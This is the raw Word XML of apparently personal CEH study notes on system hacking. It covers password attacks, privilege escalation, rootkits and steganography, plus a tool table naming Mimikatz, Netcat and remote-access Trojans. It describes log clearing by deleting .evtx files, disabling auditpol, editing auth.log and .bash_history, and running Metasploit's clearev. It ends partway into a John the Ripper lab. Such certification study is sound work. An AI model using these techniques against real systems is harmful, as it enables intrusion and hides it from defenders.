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B7AF3" w14:textId="77777777" w:rsidR="006D621F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Module 06: System Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB89630" w14:textId="77777777" w:rsidR="006D621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System hacking is the phase where the ethical hacker uses the vulnerabilities identified in the previous modules to gain unauthorized access to a system. This module follows the official EC-Council 4-step system hacking methodology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766AE72" w14:textId="77777777" w:rsidR="006D621F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System Hacking Methodology (EXAM CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EFA65" w14:textId="77777777" w:rsidR="006D621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You must memorize these four steps and the tools associated with each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6018CA42" w14:textId="77777777" w:rsidR="006D6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Gaining Access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypassing security controls to enter the system (e.g., Password cracking, exploiting vulnerabilities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32143073" w14:textId="77777777" w:rsidR="006D6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Escalating Privileges:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Moving from a standard user account to an Administrator/Root account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9389E3" w14:textId="77777777" w:rsidR="006D6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Maintaining Access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installing backdoors, rootkits, or Trojans to ensure you can return even if the initial vulnerability is patched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761DA8B2" w14:textId="77777777" w:rsidR="006D62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Clearing Logs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deleting or manipulating system logs to hide evidence of the intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADDAFB2" w14:textId="77777777" w:rsidR="006D621F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Gaining Access: Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA2365" w14:textId="77777777" w:rsidR="006D621F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Types of Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CAA89" w14:textId="77777777" w:rsidR="006D621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Dictionary Attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses a wordlist (dictionary) of common passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7499A" w14:textId="77777777" w:rsidR="006D621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Brute-Force Attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Systematically trying every possible combination of characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195F47EE" w14:textId="77777777" w:rsidR="006D621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Hybrid Attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> A dictionary attack that adds numbers or symbols to words (e.g., Password123!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775724AA" w14:textId="77777777" w:rsidR="006D621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Rainbow Table Attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses pre-computed hashes of passwords. This is extremely fast but requires massive storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6526783B" w14:textId="77777777" w:rsidR="006D621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Default Passwords:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempting "admin," "guest," or "1234."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF4D9F" w14:textId="77777777" w:rsidR="006D621F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Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B18C9B" w14:textId="77777777" w:rsidR="006D621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Salting:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adding random data to a password before hashing it. This renders Rainbow Tables useless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BC07F" w14:textId="77777777" w:rsidR="006D621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Password Complexity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforcing length and character variety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C485BB" w14:textId="77777777" w:rsidR="006D621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Account Lockouts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disabling accounts after X failed attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B163F" w14:textId="77777777" w:rsidR="006D621F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Escalating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A15B64" w14:textId="77777777" w:rsidR="006D621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Once inside, an attacker often has limited "User" rights. They must escalate to "System" or "Root" to control the entire machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BB00B" w14:textId="77777777" w:rsidR="006D621F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Types of Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD6FFC" w14:textId="77777777" w:rsidR="006D621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Vertical Privilege Escalation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gaining higher-level permissions (e.g., User → Admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061DF629" w14:textId="77777777" w:rsidR="006D621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Horizontal Privilege Escalation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gaining access to another user's resources at the same level (e.g., User A → User B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46792DAE" w14:textId="77777777" w:rsidR="006D621F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Maintaining Access: Rootkits and Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA3B30" w14:textId="77777777" w:rsidR="006D621F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Rootkits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D6526" w14:textId="77777777" w:rsidR="006D621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Software designed to hide its presence and the presence of other malware from the OS and security tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE2BF0" w14:textId="77777777" w:rsidR="006D621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Hypervisor Level:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operates by intercepting the hardware-to-OS communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A85474" w14:textId="77777777" w:rsidR="006D621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Kernel Level:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modifies the OS kernel itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCBDCE" w14:textId="77777777" w:rsidR="006D621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Library Level:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replaces standard system calls (APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA759B" w14:textId="77777777" w:rsidR="006D621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Application Level:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modifies standard application files (like ls or taskmgr.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E991E" w14:textId="77777777" w:rsidR="006D621F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Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414FD9F" w14:textId="77777777" w:rsidR="006D621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art of hiding data within other data (e.g., hiding a text file inside a .jpg image).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452A1FE" w14:textId="77777777" w:rsidR="006D621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Technical Terms:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cover-Object (original image),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Stego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-Object (image with hidden data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D4FF6" w14:textId="77777777" w:rsidR="006D621F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Clearing Logs: Hiding Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C915D2C" w14:textId="77777777" w:rsidR="006D621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Attackers must remove traces to avoid detection by a SOC (Security Operations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Center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0FB01B6F" w14:textId="77777777" w:rsidR="006D621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Windows:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deleting the .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evtx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files or using tools like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auditpol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to disable logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72191882" w14:textId="77777777" w:rsidR="006D621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Linux:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deleting or editing /var/log/auth.log, /var/log/messages, or .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bash_history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47CE335B" w14:textId="77777777" w:rsidR="006D621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Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F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clearev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command automatically clears the Application, System, and Security logs in Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94F4E9" w14:textId="77777777" w:rsidR="006D621F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Comprehensive Tool List for System Hacking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D621F" w14:paraId="6CA5C5A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847A18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Category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4CB054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Tool Name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15568A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Key Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="5BFB944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D33A6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Password Cracking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D32AF7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John the Ripper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242065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Multi-platform, multi-algorithm hash cracker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="309D472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74AD4D" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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295BAE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Hashcat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F13F4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High-performance GPU-based cracker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="7EB8383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BEFF34" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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514089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Ophcrack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5AF05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Rainbow table-based Windows password cracker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="546CCA8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50A6C9" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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1B57F1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L0phtCrack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099A2E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Professional-grade Windows password auditing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="543D19D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A35604" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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27CCA4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Cain &amp; Abel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E28CB6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Legacy Windows tool for sniffing and cracking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="3BE5E15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15A439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Privilege Escalation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4A0B5B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Mimikatz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A26412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Extracts passwords/hashes/tickets from memory (LSASS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="2F18348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03193A" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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EBB69C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BeRoot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C97848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Finds common misconfigurations for privilege escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="23CCC1F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3043E" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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68E05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PowerUp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E34B4E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PowerShell script to find Windows privilege escalation paths.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="3744EF7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AA170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Exploitation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5004B4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Metasploit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D13E04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The most popular framework for gaining and managing access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="7282CC9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A3F4DB" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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F57816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Armitage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0CA781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Graphical front-end for Metasploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="1992A6F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EF96B2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Maintaining Access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74FC69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Netcat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(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nc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042880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"Swiss Army Knife" for creating backdoors/relays.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="2C79885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1C444C" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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74E709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ProRat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/ Beast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00C6D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Specialized Trojans for remote access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="6CE6B70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713EA9" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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7DC24C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Azazel /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LoJax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39C79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Advanced rootkits (Userland/UEFI).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="0577920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079487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Steganography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D9DFED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OpenStego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705B9E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Hiding data in images using various algorithms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="5F5964D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A7B13" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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C061E5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Snow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784770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Hiding messages in the whitespace of text files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="0EE6741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7E34B8" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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B93B8E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StegHide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2E7FB8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Hiding data in BMP, WAV, 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and AU files via CLI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="3C896DC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012DD7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Clearing Logs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85883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Auditpol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787767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Windows utility to view/change audit policies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D621F" w14:paraId="759653C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455071" w14:textId="77777777" w:rsidR="006D621F" w:rsidRDefault="006D62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2C077F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CCleaner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286423" w14:textId="77777777" w:rsidR="006D62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Often used by attackers to wipe temp files/logs quickly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2317E011" w14:textId="77777777" w:rsidR="006D621F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Hands-On Lab Sessions (CEH v13 Practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBB4A1" w14:textId="77777777" w:rsidR="006D621F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Lab 1: Password Cracking (Linux Shadow Files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17352437" w14:textId="40B4E746" w:rsidR="00481CA6" w:rsidRDefault="006723F3" w:rsidP="00481CA6">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007A1BF7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=piNkLNqDto4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CC97ADF" w14:textId="77777777" w:rsidR="006723F3" w:rsidRDefault="006723F3" w:rsidP="00481CA6"/>
    <w:p w14:paraId="1C4D028E" w14:textId="1D837561" w:rsidR="006723F3" w:rsidRDefault="006723F3" w:rsidP="00481CA6">
      <w:r>
        <w:t>Pre-requisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B1EE74" w14:textId="27A93806" w:rsidR="006723F3" w:rsidRDefault="006723F3" w:rsidP="006723F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check whether john the ripper is installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0774AC9B" w14:textId="7D9323A6" w:rsidR="006723F3" w:rsidRDefault="006723F3" w:rsidP="006723F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r w:rsidRPr="006723F3">
        <w:t xml:space="preserve">john </w:t>
      </w:r>
      <w:r w:rsidR="00B35BD5">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="006723F3">
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803964B" w14:textId="30584065" w:rsidR="00B35BD5" w:rsidRDefault="00B35BD5" w:rsidP="006723F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B35BD5">
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B35BD5">
        <w:t xml:space="preserve"> -l | grep john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E58920" w14:textId="261CE4C7" w:rsidR="00CF4C3D" w:rsidRDefault="00CF4C3D" w:rsidP="006723F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>find where it installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D2624" w14:textId="72FBEC91" w:rsidR="006723F3" w:rsidRDefault="00AB51B0" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB51B0">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB51B0">
        <w:t xml:space="preserve"> find / -name john 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA82BE" w14:textId="77777777" w:rsidR="007A26EB" w:rsidRDefault="007A26EB" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFB8889" w14:textId="68EA2954" w:rsidR="007A26EB" w:rsidRDefault="007A26EB" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r w:rsidRPr="007A26EB">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A26EB">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A26EB">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A26EB">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A26EB">
        <w:t>/john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE127C" w14:textId="1B3ED770" w:rsidR="007A26EB" w:rsidRDefault="00803B66" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r w:rsidRPr="00803B66">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00803B66">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803B66">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00803B66">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803B66">
        <w:t xml:space="preserve">/john </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00803B66">
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0CB6C" w14:textId="638181C6" w:rsidR="00803B66" w:rsidRDefault="00084AE4" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r w:rsidRPr="00084AE4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00084AE4">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00084AE4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00084AE4">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00084AE4">
        <w:t>/john --list=build-info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DC84BC" w14:textId="77777777" w:rsidR="007154D4" w:rsidRDefault="007154D4" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450E4098" w14:textId="39F1BAC4" w:rsidR="007154D4" w:rsidRDefault="008C60C7" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Its available in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A204958" w14:textId="77777777" w:rsidR="008C60C7" w:rsidRDefault="008C60C7" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06850FB4" w14:textId="36B62B79" w:rsidR="008C60C7" w:rsidRDefault="009B6022" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6022">
        <w:t>echo $PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628E2BF" w14:textId="77777777" w:rsidR="00A379A5" w:rsidRDefault="00A379A5" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7132D239" w14:textId="2A4863C9" w:rsidR="00A379A5" w:rsidRDefault="00A379A5" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">add permanently. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF2D0FE" w14:textId="77777777" w:rsidR="00A379A5" w:rsidRDefault="00A379A5" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F835C43" w14:textId="77777777" w:rsidR="00A379A5" w:rsidRDefault="00A379A5" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>echo 'export PATH="$PATH:/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"' &gt;&gt;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144A8EBE" w14:textId="6D77611C" w:rsidR="009B6022" w:rsidRDefault="00A379A5" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>source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7C90EA7D" w14:textId="77777777" w:rsidR="00896588" w:rsidRDefault="00896588" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1674DA" w14:textId="3203035E" w:rsidR="00896588" w:rsidRDefault="00896588" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>just type john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A247676" w14:textId="77777777" w:rsidR="00896588" w:rsidRDefault="00896588" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391C22EE" w14:textId="79B0FF45" w:rsidR="003D64A8" w:rsidRDefault="003D64A8" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>to test whether it is installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB70DA" w14:textId="77777777" w:rsidR="003D64A8" w:rsidRDefault="003D64A8" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F2502F" w14:textId="21E3BED1" w:rsidR="00896588" w:rsidRDefault="00F236BE" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> add user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D64A8">
        <w:t>testuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FF72D43" w14:textId="77777777" w:rsidR="003D64A8" w:rsidRDefault="003D64A8" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0A6A22" w14:textId="66F870DC" w:rsidR="003D64A8" w:rsidRDefault="003D64A8" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>enter password</w:t>
      </w:r>
      <w:r w:rsidR="009359C3">
        <w:t>:12345678</w:t>
      </w:r>
    </w:p>
